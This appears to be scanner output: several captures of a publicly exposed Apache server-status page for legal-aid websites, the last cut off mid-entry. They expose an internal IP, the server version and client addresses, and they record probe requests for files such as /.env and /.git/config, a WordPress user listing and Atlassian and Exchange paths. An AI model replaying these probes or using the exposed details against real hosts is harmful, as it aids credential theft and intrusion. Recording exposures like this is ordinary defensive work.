2-174126136/11/485642K 0.66007.00.2022675.83 70.132.60.147http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 3-174126193/6/478137K 0.46004.70.1322266.17 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-174-0/0/461357. 0.0028300.00.0021577.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-174122882/32/440295K 2.81002.73.3320913.43 70.132.4.89http/1.1legalaidconnections.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 6-174-0/0/420933. 0.0028200.00.0020522.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-174-0/0/406092. 0.8928100.00.0019508.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-174-0/0/392418. 0.0027900.00.0018077.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-174123764/19/364968K 1.93004.81.4317337.70 70.132.60.147http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 10-174119804/64/344147K 3.38005.89.2416157.89 70.132.4.89http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 11-174-0/0/312172. 0.0027800.00.0015015.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-174126403/7/290973K 0.59004.10.1413836.28 70.132.4.89http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 13-174124571/9/270387W 1.01001.60.3012653.24 70.132.4.89http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 14-174124622/27/261524K 1.23002.82.5711866.67 70.132.4.89http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 15-174-0/0/241325. 0.0027100.00.0011187.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-174-0/0/216843. 1.5557500.00.009739.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-174-0/0/185629. 0.0059000.00.008760.33 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-174-0/0/167882. 0.0058900.00.008134.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-174-0/0/160928. 0.0058800.00.007657.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-174-0/0/157479. 0.0058700.00.007162.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-174-0/0/143246. 0.0058600.00.006704.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-174-0/0/139298. 0.0058500.00.006511.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-174-0/0/134171. 0.0058400.00.006000.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-174-0/0/125242. 0.00167200.00.005581.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-174-0/0/63539. 0.00167000.00.002761.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-174122273/38/53237K 3.89004.54.062391.10 70.132.4.89http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 27-174-0/0/43996. 0.00166700.00.001968.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-174-0/0/47766. 0.00168700.00.001945.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-174-0/0/39867. 0.00168600.00.001651.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-174-0/0/47675. 0.00168300.00.001923.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-174-0/0/37646. 0.00168400.00.001624.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-174-0/0/40450. 0.00168500.00.001803.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-174-0/0/39373. 0.00170800.00.001874.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-174-0/0/40390. 0.00170700.00.001781.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-174-0/0/40542. 0.00170600.00.001744.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-174-0/0/38817. 0.00170500.00.001846.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-174-0/0/40106. 0.00170400.00.001877.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-174-0/0/42962. 0.00170300.00.001663.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-174-0/0/38845. 0.00170200.00.001704.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-174-0/0/38452. 1.7775400.00.001655.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-174-0/0/7664. 0.00472200.00.00374.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-174-0/0/5134. 0.141598900.00.00195.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-174-0/0/5418. 0.271598200.00.00197.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-174-0/0/3188. 0.131599100.00.00168.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-174-0/0/3257. 0.251597500.00.00168.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-174-0/0/2829. 0.251597700.00.0079.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-174-0/0/2659. 0.271598300.00.00111.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-174-0/0/2698. 0.221598400.00.0093.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-174-0/0/2215. 0.131599400.00.0078.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-174-0/0/2096. 0.241598500.00.0095.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-174-0/0/2161. 0.231598000.00.0089.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-174-0/0/2669. 0.231598100.00.0089.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-174-0/0/2064. 0.261597200.00.0068.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-174-0/0/2158. 0.771591300.00.0091.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-174-0/0/1850. 0.241597900.00.0083.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-174-0/0/2244
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edb49200f7
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Friday, 16-Dec-2022 04:48:03 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 175 Parent Server MPM Generation: 174 Server uptime: 174 days 22 hours 4 minutes 22 seconds Server load: 0.00 0.01 0.00 Total accesses: 8415053 - Total Traffic: 383.4 GB CPU Usage: u42.49 s4.67 cu0 cs0 - .000312% CPU load .557 requests/sec - 26.6 kB/second - 47.8 kB/request 19 requests currently being processed, 0 idle workers KKKKKKKKKKKKKKKKKWSS......K..................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-174126804/4/523284K 0.00005.50.0124465.59 70.132.4.89http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 1-174124365/14/500460K 0.78205.82.6624188.03 70.132.60.147http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 2-174126136/11/485642K 0.66207.00.2022675.83 70.132.60.147http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 3-174126197/10/478141K 0.460010.30.1422266.17 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 4-174126852/2/461359K 0.00002.60.0021577.17 70.132.4.89http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 5-174122886/36/440299K 2.810011.13.3420913.44 70.132.4.89http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 6-174126861/1/420934K 0.00201.00.0020522.42 130.176.17.72http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 7-174126951/1/406093K 0.001040.60.0419508.58 130.176.17.72http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 8-174126962/2/392420K 0.00002.80.0018077.22 70.132.4.89http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 9-174123764/19/364968K 1.93204.81.4317337.70 70.132.60.147http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 10-174119806/66/344149K 3.38007.99.2416157.89 70.132.4.89http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 11-174127012/2/312174K 0.00002.10.0015015.85 70.132.4.89http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 12-174126407/11/290977K 0.59009.60.1413836.29 70.132.4.89http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 13-174124574/12/270390K 1.01008.90.3012653.24 70.132.4.89http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 14-174124626/31/261528K 1.23007.32.5811866.67 70.132.4.89http/1.1legalaidconnections.org:8080GET /config.json HTTP/1.1 15-174127062/2/241327K 0.00012.80.0011187.82 70.132.4.89http/1.1legalaidconnections.org:8080GET / HTTP/1.1 16-174127151/1/216844K 0.00001.00.009739.32 70.132.4.95http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 17-174127160/0/185629W 0.00000.00.008760.33 70.132.4.89http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 18-174127210/0/167882S 0.0059200.00.008134.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-17400/0/160928S 0.0059100.00.007657.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-174-0/0/157479. 0.0059000.00.007162.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-174-0/0/143246. 0.0058900.00.006704.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-174-0/0/139298. 0.0058800.00.006511.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-174-0/0/134171. 0.0058700.00.006000.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-174-0/0/125242. 0.00167400.00.005581.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-174-0/0/63539. 0.00167200.00.002761.63 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-174122276/41/53240K 3.90007.84.072391.11 70.132.4.89http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 27-174-0/0/43996. 0.00166900.00.001968.44 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-174-0/0/47766. 0.00168900.00.001945.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-174-0/0/39867. 0.00168800.00.001651.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-174-0/0/47675. 0.00168500.00.001923.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-174-0/0/37646. 0.00168600.00.001624.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-174-0/0/40450. 0.00168700.00.001803.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-174-0/0/39373. 0.00171000.00.001874.79 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-174-0/0/40390. 0.00170900.00.001781.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-174-0/0/40542. 0.00170800.00.001744.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-174-0/0/38817. 0.00170700.00.001846.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-174-0/0/40106. 0.00170600.00.001877.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-174-0/0/42962. 0.00170500.00.001663.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-174-0/0/38845. 0.00170400.00.001704.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-174-0/0/38452. 1.7775600.00.001655.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-174-0/0/7664. 0.00472500.00.00374.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-174-0/0/5134. 0.141599100.00.00195.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-174-0/0/5418. 0.271598400.00.00197.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-174-0/0/3188. 0.131599300.00.00168.07 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-174-0/0/3257. 0.251597700.00.00168.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-174-0/0/2829. 0.251597900.00.0079.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-174-0/0/2659. 0.271598500.00.00111.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-174-0/0/2698. 0.221598600.00.0093.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-174-0/0/2215. 0.131599600.00.0078.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-174-0/0/2096. 0.241598700.00.0095.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-174-0/0/2161. 0.231598200.00.0089.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-174-0/0/2669. 0.231598300.00.0089.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-174-0/0/2064. 0.261597400.00.0068.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-174-0/0/2158. 0.771591500.00.0091.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-174-0/0/1850. 0.241598100.00.008
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627edca184454
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:25 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 44 seconds Server load: 7.79 2.02 0.67 Total accesses: 5117928 - Total Traffic: 242.1 GB CPU Usage: u64.6 s9.45 cu0 cs0 - .000747% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 24 requests currently being processed, 117 idle workers _____C__________K______._________________.._K_________KKKK______ ___.W____..K__________KK____K__KK__K_____________K.K__K_________ ..__K____K__K__K_K___K Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208260/10/315822_ 0.49540.00.2115274.73 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/media-views.min.js?ver=5.6.9 HTTP/1.1 1-114208360/11/307288_ 0.440610.00.2815604.10 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /v2/_catalog HTTP/1.1 2-114202770/14/296203_ 0.48800.00.6114399.81 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/shortcode-for-current-date/dist/script. 3-114202780/13/291724_ 0.71900.00.4414074.89 130.176.163.160http/1.1esign.alas.org:8080GET /assets/libs/switchery/switchery.min.css HTTP/1.1 4-114202870/20/280075_ 0.42700.00.1214108.18 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/plugins/buddypress/bp-core/js/vendor/jquery-coo 5-114208371/4/270954C 0.71000.20.0513303.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-114208460/10/257853_ 0.364890.00.2412980.38 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 7-114203470/17/249549_ 0.4941660.00.5112283.52 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 8-114208470/7/236975_ 0.30700.00.2311522.25 64.252.75.130http/1.1intranet.alas.org:8080GET /wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect 9-114208480/5/226041_ 0.42800.00.0511118.82 15.158.47.74http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5. 10-114200190/32/214615_ 2.35500.01.5010231.84 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/clipboard.min.js?ver=5.6.9 HTTP/1.1 11-114208490/5/192020_ 0.27930.00.029331.34 15.158.47.114http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.css 12-114203640/8/176710_ 0.604700.00.038770.58 70.132.36.172http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 13-114208750/6/168051_ 0.32500.00.058058.79 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-util.min.js?ver=5.6.9 HTTP/1.1 14-114208760/5/156067_ 0.32500.00.057530.94 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-backbone.min.js?ver=5.6.9 HTTP/1.1 15-114203840/8/149539_ 0.659590.00.297254.66 15.158.47.68http/1.1elearning.alas.org:8080GET /theme/yui_combo.php?rollup/3.17.2/yui-moodlesimple-min.js 16-114203851/11/134169K 0.80201.00.286325.06 15.158.50.13http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 17-114196100/84/112414_ 8.100530.01.795336.20 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /about HTTP/1.1 18-114208770/6/103354_ 0.429210.00.225129.02 130.176.163.160http/1.1esign.alas.org:8080GET /assets/fonts/Lato/Lato-Bold.ttf HTTP/1.1 19-114199130/56/93822_ 3.065210.02.784748.88 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/themes/woffice/js/woffice.min.js HTTP/1.1 20-114208780/6/93903_ 0.160810.00.104523.92 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 21-114208790/9/86198_ 0.2241900.00.764052.18 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 22-114204010/8/84820_ 0.789980.00.324104.98 15.158.47.115http/1.1elearning.alas.org:8080GET /pluginfile.php/162/course/overviewfiles/Moodle%20images%20 23-114-0/0/79171. 0.71200.00.003709.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-114208800/9/71775_ 0.511590.00.233443.28 130.176.208.148http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 25-114204240/10/38028_ 0.42500.00.231723.78 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/api-request.min.js?ver=5.6.9 HTTP/1.1 26-114204250/10/30108_ 0.39500.00.221388.77 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-embed.min.js?ver=5.6.9 HTTP/1.1 27-114204300/13/27640_ 0.780560.00.381254.09 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /api/search?folderIds=0 HTTP/1.1 28-114204350/14/25412_ 0.305330.00.741161.96 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/uploads/2020/03/1.jpg HTTP/1.1 29-114200920/29/23714_ 1.9092250.04.981038.81 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 30-114204400/11/25348_ 0.60500.00.191138.96 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/shortcode.min.js?ver=5.6.9 HTTP/1.1 31-114208810/4/23303_ 0.10930.00.051016.86 15.158.47.117http/1.1elearning.alas.org:8080GET /lib/javascript.php/1564020885/lib/requirejs/require.min.js 32-114208820/7/24129_ 0.40900.00.111138.41 130.176.163.160http/1.1esign.alas.org:8080GET /assets/libs/sweetalert/sweetalert.css HTTP/1.1 33-114209220/6/23760_ 0.294530.00.251124.06 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /about HTTP/1.1 34-114204520/11/24937_ 0.51500.00.161086.57 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.6 35-114204610/14/26415_ 0.65900.00.091149.03 130.176.163.160http/1.1esign.alas.org:8080GET /assets/js//jquery.slimscroll.min.js HTTP/1.1 36-114204620/10/22948_ 0.7241600.00.471008.72 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/zxcvbn.min.js HTTP/1.1 37-114209230/6/23499_ 0.264780.01.021058.34 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 38-114204670/15/23027_ 0.970520.00.431015.69 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 39-114209240/6/22436_ 0.00100.00.01936.87 70.132.31.90http/1.1picturingjustice.org:8080GET / HTTP/1.1 40-114204720/12/23693_ 0.56550.00.32997.95 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/mediaelement-and-player.min.js 41-114-0/0/4963. 0.62600.00.00210.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-114-0/0/2826. 0.35400.00.00108.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-114204870/8/3169_ 0.52560.00.13137.33 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/contact-form-7-conditional-fields-pro/j 44-114205048/20/2001K 0.630020.60.34129.80 130.176.208.180http/1.1legalaidconnections.org:8080GET /debug/default/view?panel=config HTTP/1.1 45-114205050/12/1936_ 0.5041320.00.2795.39 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 46-114209260/3/1815_ 0.658620.00.2248.29 15.158.47.115http/1.1elearning.alas.org:8080GET /lib/requirejs.php/1564020885/core/first.js HTTP/1.1 47-114205150/11/1944_ 0.45800.00.2184.63 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/buddypress/bp-core/js/widget-members.mi 48-114209270/10/1572_ 0.260570.00.1452.75 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 49-114209280/5/1463_ 0.25500.00.1055.44 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/media-editor.min.js?ver=5.6.9 HTTP/1.1 50-114
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed2f7b980a
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-06-23T12:51:37 Current Time: Monday, 17-Oct-2022 00:02:26 UTC Restart Time: Friday, 24-Jun-2022 06:43:41 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 114 days 17 hours 18 minutes 45 seconds Server load: 7.79 2.02 0.67 Total accesses: 5117966 - Total Traffic: 242.1 GB CPU Usage: u64.64 s9.47 cu0 cs0 - .000748% CPU load .516 requests/sec - 25.6 kB/second - 49.6 kB/request 44 requests currently being processed, 96 idle workers ___K_._____K___KK_K___K._____K_KK__K_____.._K________KKKKK______ _K_.K__K_..K__C_K_K___KK__K_K__KK__K_______K__K__K.KK_KW________ ..__KK___K__K__K_K___K Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114208260/10/315822_ 0.49640.00.2115274.73 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/media-views.min.js?ver=5.6.9 HTTP/1.1 1-114208360/11/307288_ 0.441610.00.2815604.10 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /v2/_catalog HTTP/1.1 2-114202770/14/296203_ 0.48800.00.6114399.81 64.252.74.146http/1.1intranet.alas.org:8080GET /wp-content/plugins/shortcode-for-current-date/dist/script. 3-114202781/14/291725K 0.72011.40.4414074.89 130.176.208.180http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 4-114202870/20/280075_ 0.42800.00.1214108.18 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/plugins/buddypress/bp-core/js/vendor/jquery-coo 5-114-0/0/270954. 0.71000.00.0013303.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-114208460/10/257853_ 0.365890.00.2412980.38 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 7-114203470/17/249549_ 0.4951660.00.5112283.52 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET /s/35322e32312e3230392e3738/_/;/META-INF/maven/com.atlassia 8-114208470/7/236975_ 0.30800.00.2311522.25 64.252.75.130http/1.1intranet.alas.org:8080GET /wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect 9-114208480/5/226041_ 0.42800.00.0511118.82 15.158.47.74http/1.1intranet.alas.org:8080GET /wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5. 10-114200190/32/214615_ 2.35600.01.5010231.84 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/clipboard.min.js?ver=5.6.9 HTTP/1.1 11-114208491/6/192021K 0.27001.10.029331.34 130.176.208.180http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 12-114203640/8/176710_ 0.604700.00.038770.58 70.132.36.172http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 13-114208750/6/168051_ 0.32600.00.058058.79 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-util.min.js?ver=5.6.9 HTTP/1.1 14-114208760/5/156067_ 0.32600.00.057530.94 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-backbone.min.js?ver=5.6.9 HTTP/1.1 15-114203841/9/149540K 0.65001.10.307254.66 130.176.208.180http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 16-114203851/11/134169K 0.80301.00.286325.06 15.158.50.13http/1.1legalaidconnections.org:8080GET /login.action HTTP/1.1 17-114196100/84/112414_ 8.101530.01.795336.20 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /about HTTP/1.1 18-114208771/7/103355K 0.42001.10.225129.02 130.176.208.180http/1.1legalaidconnections.org:8080GET /.git/config HTTP/1.1 19-114199130/56/93822_ 3.066210.02.784748.88 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/themes/woffice/js/woffice.min.js HTTP/1.1 20-114208780/6/93903_ 0.161810.00.104523.92 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 21-114208790/9/86198_ 0.2251900.00.764052.18 15.158.50.39http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 22-114204011/9/84821K 0.78001.10.324104.98 130.176.208.138http/1.1legalaidconnections.org:8080GET /api/search?folderIds=0 HTTP/1.1 23-114-0/0/79171. 0.71300.00.003709.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-114208800/9/71775_ 0.511590.00.233443.28 130.176.208.148http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 25-114204240/10/38028_ 0.42600.00.231723.78 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/api-request.min.js?ver=5.6.9 HTTP/1.1 26-114204250/10/30108_ 0.39600.00.221388.77 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/wp-embed.min.js?ver=5.6.9 HTTP/1.1 27-114204300/13/27640_ 0.780560.00.381254.09 130.176.208.180http/1.1gwinnettfamilylawclinic.org:808GET /api/search?folderIds=0 HTTP/1.1 28-114204350/14/25412_ 0.306330.00.741161.96 64.252.75.49http/1.1intranet.alas.org:8080GET /wp-content/uploads/2020/03/1.jpg HTTP/1.1 29-114200921/30/23715K 1.90001.44.981038.81 130.176.208.180http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 30-114204400/11/25348_ 0.60600.00.191138.96 15.158.47.72http/1.1intranet.alas.org:8080GET /wp-includes/js/shortcode.min.js?ver=5.6.9 HTTP/1.1 31-114208811/5/23304K 0.10001.30.051016.86 130.176.208.180http/1.1legalaidconnections.org:8080PUT 